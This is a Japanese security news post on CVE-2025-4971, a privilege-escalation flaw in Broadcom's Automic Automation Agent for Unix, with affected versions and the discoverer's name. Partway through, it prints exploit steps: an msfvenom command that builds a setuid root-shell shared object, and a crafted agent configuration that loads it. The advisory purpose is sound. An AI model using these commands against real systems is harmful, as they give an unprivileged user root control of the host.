Is Your Unix Automation Secure? Critical Broadcom Flaw Poses High Risk
2025/05/21 SecurityOnline — Broadcom が公表したのは、Unix 向けの Automic Automation Agent に影響を与える、権限昇格の脆弱性に関するセキュリティ・アドバイザリである。この脆弱性は CVE-2025-4971 として追跡されており、CVSS スコア 8.5 が割り当てられている。この脆弱性を悪用する権限を持たないユーザーが、昇格後の権限で任意のコードを実行する可能性があるため、Unix 環境における自動化インフラに深刻な脅威が生じている。

この脆弱性は、Unix 環境の Broadcom Automic Automation Agent に影響する。
影響を受ける製品
- Broadcom Automic Automation Agent Unix 24.3.0 HF4 未満
- Broadcom Automic Automation Agent Unix 21.0.13 HF1 未満
影響を受けない製品
- Broadcom Automic Automation Agent Unix 24.3.0 HF4 以降
- Broadcom Automic Automation Agent Unix 21.0.13 HF1 以降
管理者に対して強く推奨されるのは、使用中のバージョンおよびホットフィックスの適用状況を確認し、影響の有無を評価することである。
悪意の共有オブジェクトを介した、エージェント・プロセスの実行フローの乗っ取りに悪用される可能性がある。
この脆弱性は、secuvera GmbH 所属の Flora Schafer により発見された。
悪用手順の例:
- msfvenom を使用して悪意の共有オブジェクトフ・ァイルを生成する:
msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD=”/bin/sh” -f elf-so > /tmp/sh.so
- 細工された .so ペイロードを使用して、脆弱なエージェントバイナリを実行する:
/ucxjlx6 ini=<(echo -e 「[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep」)
この攻撃に成功した攻撃者は、root シェルを取得し、ホストの完全な制御を達成するとされる。
Broadcom の Automic Automation Agent ですが、同社のサイトには、「Automic Automationは、ITシステムとコンポーネントを操作するように設計されている。そのため、すべてのガイドには、遵守すべき警告、推奨事項、および、注意事項が含まれている。ドキュメントに警告が記載されていない場合でも、Automic Automationおよびコンポーネントのユーザーまたは管理者は、影響を受けるサービスレベルを保護および確保し、関連するシステムへの損害や損傷を回避できる」と説明されていました。なんか、記事本文を書いたライターさんも、情報が少なくて、困っているように感じます。よろしければ、Unix で検索も、ご参照ください。
You must be logged in to post a comment.